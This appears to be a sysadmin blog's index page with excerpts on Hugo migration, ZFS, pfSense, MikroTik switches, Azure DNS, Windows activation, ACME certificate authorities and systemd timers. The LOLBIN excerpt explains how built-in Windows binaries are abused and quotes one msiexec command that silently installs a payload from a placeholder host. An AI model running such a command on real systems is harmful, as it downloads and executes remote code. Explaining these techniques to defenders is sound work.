I’ve decided to migrate this blog to Hugo due to several reasons. hugo generates a static webpage so it removes the need for constant updates server side, such as MariaDB, PHP and WordPress itself. It also eliminates the security concern of the WordPress ecosystem (such as themes and plugins). I used wp2hugo to do the heavy lifting since this blog is very simple and a good candidate for it. Couple of fixes later, this is the result and I’m happy with it. ...

Many types of malware and remote access trojans (RAT) today now use built-in Windows binaries to stage and infect computers. Programs commonly used in such attacks are powershell.exe, regsvr32, rundll32, certreq.exe, certutil.exe and mshta.exe. Living of the land binaries (LOLBINs) bypass protections such as AppLocker since they reside in the c:\Windows folder and/or are codesigned by Microsoft. One example is msiexec /q /i http://192.168.100.3/tmp/cmd.png A great overview of how built-in binaries can be “abused” to download or execute code can be found at the LOLBAS project. ...

At work I’m setting up a new syslog server and wanted the logs to be stored raw on disk (that is not compressed using gzip). To do that I created a ZFS pool with compression enabled allowing for transparent compression. First I created a zpool with a single disk (this is a VM so no redundancy is needed): # Create a pool with the name 'zlog' zpool create zlog /dev/sdb # Enable compression zfs set compression=on zlog # Set the mountpoint mkdir /logs zfs set mountpoint=/logs logpool This results in a mounted zfs volume: ...

I recently purchased a MikroTik CRS309-1G-8S-IN router/switch and some generic SFP+ modules from FS.com (mix of 10GbE RJ45 and 850nm MMF modules) to upgrade my home network to 10 gigabit ethernet. One thing I noticed using SwOS version 2.13 on the switch is that after link down event (such as when a computer is turned off) the corresponding SFP+ module would stop responding. To make it start working again I would have to reboot the switch or reinsert the SFP+ module. Same thing happened with some Intel FTLX8571D3BCL-IT modules I had on hand. ...

After doing a pfSense upgrade where the underlying base system has been upgraded like from 2.4.5p1 (FreeBSD 11.3) to 2.5.1 (FreeBSD 12.2) it is wise to upgrade the ZFS feature level. If booting from GPT (UEFI) with ZFS zroot the zfs feature level upgrade process might have some gotchas that can cause the system not to boot. Before doing this take configuration backup and have restore image/usb ready. This example is with a single disk setup no zpool mirror/stripe. ...

When installing pfSense 2.5.0 on Seeedstudio Odyssey Blue J4105 I observed the following error message in the system buffer after I selected ZFS install: ahcich0: is 00000000 cs 00000000 ss 00000080 rs 00000080 tfd 50 serr 00000000 cmd 0000d117 (ada0:ahcich0:0:0:0): SEND_FPDMA_QUEUED DATA SET MANAGEMENT. ACB: 64 01 00 00 00 40 00 00 00 00 00 00 (ada0:ahcich0:0:0:0): CAM status: Command timeout (ada0:ahcich0:0:0:0): Retrying command, 3 more tries remain After retrying couple of times the system installed successfully. After install this error caused the boot to stall for some time but it booted successfully. ...

At work we recently moved our DNS hosting to Azure DNS in order to simplify our hosting and benefiting from existing RBAC in Azure AD. One benefit of the move is that we could generate limited API keys for clients to be able to use ACME DNS-01 challenge for certificate validation. We have been using acme.sh and it has documentation how to create a limited service principal for DNS-01 validation. This works really well but what if you want to view the permission the service principal has? ...

At work we are moving everything to Microsoft 365 and Azure AD and removing our on-premises environment. One of the issue we encountered was that when we removed the computer from the domain and joined Azure AD, Windows was still activated using our KMS host. In order to convert the computer to use step-up activation (digital license) we had to install the product key that came with the machine (OEM) and then it would automatically change it to digital license subscription. ...

Please note that many ACME clients only support Let’s Encrypt. Certbot should work with alternative ACME providers. Buypass Go SSL Norwegian certificate authority offering free SSL certificates valid for 180 days ( Technical specifications). No wildcard certificates. ACME directory url: https://api.buypass.com/acme/directory Chains up to " Buypass Class 2 Root CA" valid until 2040 DNS CAA: buypass.com Rate limits: 20 per registered domain/week, 5 duplicate certificates/week. Example commands for Certbot / acme.sh: # Certbot certbot register -m 'YOUR_EMAIL' --agree-tos \ --server 'https://api.buypass.com/acme/directory' certbot certonly --webroot -w /var/www/example.com/public_html/ \ -d example.com -d www.example.com \ --server 'https://api.buypass.com/acme/directory' # acme.sh acme.sh --server https://api.buypass.com/acme/directory \ --register-account --accountemail [email protected] acme.sh --server https://api.buypass.com/acme/directory \ --issue -d example.com -d www.example.com \ --webroot /var/www/example.com/public_html/ \ --days 170 Let’s Encrypt US based certificate authority offering free certificates valid for 90 days. Currently default in most ACME clients (certbot, acme.sh etc.). ...

To run systemd timer jobs (cron) as a user you’ll need to create a systemd service folder as the user: mkdir -p ~/.config/systemd/user/ By default, systemd will only run timers if the user is logged in so to be able to run timer jobs without logged in use we enable lingering session with loginctl enable-linger username Then you can drop the .service and .timer files in the ~/.config/systemd/user folder. To pick up the job you’ll need to run (as the user) ...